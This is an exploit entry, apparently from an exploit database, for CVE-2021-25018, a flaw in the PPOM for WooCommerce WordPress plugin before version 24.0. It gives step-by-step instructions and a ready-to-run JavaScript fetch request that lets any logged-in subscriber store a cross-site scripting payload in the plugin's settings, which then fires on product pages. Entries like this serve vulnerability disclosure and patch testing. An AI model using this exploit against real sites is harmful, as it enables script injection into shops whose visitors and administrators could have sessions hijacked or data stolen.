Exploit for PPOM for WooCommerce < 24.0 - Subscriber+ Settings Update to Stored XSS CVE-2021-25018

## https://sploitus.com/exploit?id=WPEX-ID:9E092AAD-0B36-45A9-8987-8D904B34FBB2
1. Use the new settings panel framework by clicking the "migrate" button on https://example.com/wp-admin/admin.php?page=wc-settings&tab=ppom_settings
2. Attach PPOM fields to any Woocommerce product (product must have a price set for XSS to trigger)
3. Run (as any logged-in user, e.g. a subscriber):

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=ppom_settings_panel_action&ppom-settings_panel[ppom_label_product_price]=<img src onerror=alert(`XSS`) x",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

4. The XSS will be triggered on the products where PPOM fields are enabled